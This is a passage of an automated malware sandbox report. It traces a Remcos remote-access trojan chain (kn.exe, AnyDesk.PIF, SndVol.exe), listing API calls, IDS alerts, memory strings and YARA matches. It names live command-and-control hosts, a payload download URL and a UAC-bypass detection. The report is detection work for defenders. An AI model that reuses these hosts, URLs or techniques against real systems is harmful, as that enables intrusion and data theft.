              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68FC8D4A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68FC8B3D8
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D35908

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49709 -> 77.221.149.38:47666
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn
              Source: Malware configuration extractorURLs: iamblessed.duckdns.org
              Source: Malware configuration extractorIPs: 127.0.0.1
              Uses dynamic DNS services
              Source: unknownDNS query: name: iamblessed.duckdns.org
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4E4B8 InternetCheckConnectionA,10_2_02D4E4B8
              Source: global trafficTCP traffic: 192.168.2.8:49709 -> 77.221.149.38:47666
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
              Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49710 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /v/233_Faogvkghvqn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ferreiragascuritiba.com.br
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /v/233_Faogvkghvqn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ferreiragascuritiba.com.br
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: ferreiragascuritiba.com.br
              Source: global trafficDNS traffic detected: DNS query: iamblessed.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
              Source: AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B1D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ferreiragascuritiba.com.b
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ferreiragascuritiba.com.br/
              Source: AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B08000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqnath
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnP
              Source: SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.(K
              Source: AnyDesk.PIF, 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpfH5
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl:H
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1523550345.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000016.00000002.1647310662.0000000002DA2000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1717002790.0000000002E42000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
              Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
              Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
              Registers a new ROOT certificate
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF68FCB60BC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC90F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF68FC90F58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF68FCA0EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6EA8 NCryptImportKey,#360,7_2_00007FF68FCD6EA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68FC8EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC629A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68FC629A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCDA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC625E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF68FC625E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68FC9E1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68FC3FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68FC2F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68FCD98B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF68FC9184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA342C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCD93A0

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
